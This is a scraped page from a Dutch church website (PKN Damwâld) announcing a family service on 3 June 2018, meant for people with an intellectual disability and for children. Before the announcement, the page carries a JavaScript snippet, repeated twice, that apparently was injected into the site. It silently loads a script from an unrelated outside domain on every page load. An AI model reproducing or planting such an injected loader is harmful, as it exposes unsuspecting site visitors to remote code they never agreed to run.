;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... 'uitrusten !' - PKN Damwâld

Bijzondere gezinsdienst … ‘uitrusten !’

Gepubliceerd op: maandag 28 mei 2018

Zondagmiddag 3 juni 2018 is iedereen om 14.00 uur van harte welkom in De Ikker voor een bijzondere gezinsdienst. Ds. G. Timmer zal ingaan op het thema ‘Uitrusten’. Klaas Steegstra zal zijn medewerking verlenen aan de dienst. Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op  mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.